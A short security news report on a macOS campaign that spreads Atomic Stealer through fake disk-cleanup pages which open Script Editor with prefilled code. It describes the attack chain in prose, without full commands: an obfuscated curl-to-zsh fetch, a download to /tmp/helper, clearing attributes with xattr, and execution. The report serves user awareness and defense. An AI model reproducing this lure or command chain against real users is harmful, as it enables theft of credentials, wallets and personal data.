A new malware campaign is targeting macOS users with Atomic Stealer, also known as AMOS, by abusing the built-in Script Editor app in a ClickFix-style attack that avoids Terminal prompts, according to a technical analysis from Jamf.
KEY FACTS
- Delivery method Fake Apple-themed pages use the applescript:// scheme to open Script Editor with malicious code.
- Payload The code launches an obfuscated curl | zsh command that fetches and runs a script in memory.
- Final malware The payload drops a Mach-O binary identified as Atomic Stealer.
- Defense macOS Tahoe 26.4 adds a warning when users try to execute Terminal commands in ClickFix attacks.
The campaign uses web pages that pose as guides for reclaiming disk space on a Mac. The pages show cleanup instructions, then trigger Script Editor with prefilled executable code.
The script runs a hidden chain that decodes a base64 and gzip payload, downloads a file to /tmp/helper, clears security attributes with xattr -c, makes the file executable, and starts it. The report says the binary steals data from the Keychain, desktop, browser wallets, autofill data, passwords, cookies, stored credit cards, and system information.
Atomic Stealer has been used widely in recent ClickFix campaigns and last year gained a backdoor component for persistent access to compromised systems. Mac users are advised to treat Script Editor prompts as high-risk and to rely on official Apple documentation for troubleshooting.
WHY IT MATTERS
The campaign shows how attackers can shift from Terminal-based social engineering to a trusted built-in app to reach Mac users. It also highlights that even familiar troubleshooting prompts can be used to launch malware if users follow them without verifying the source.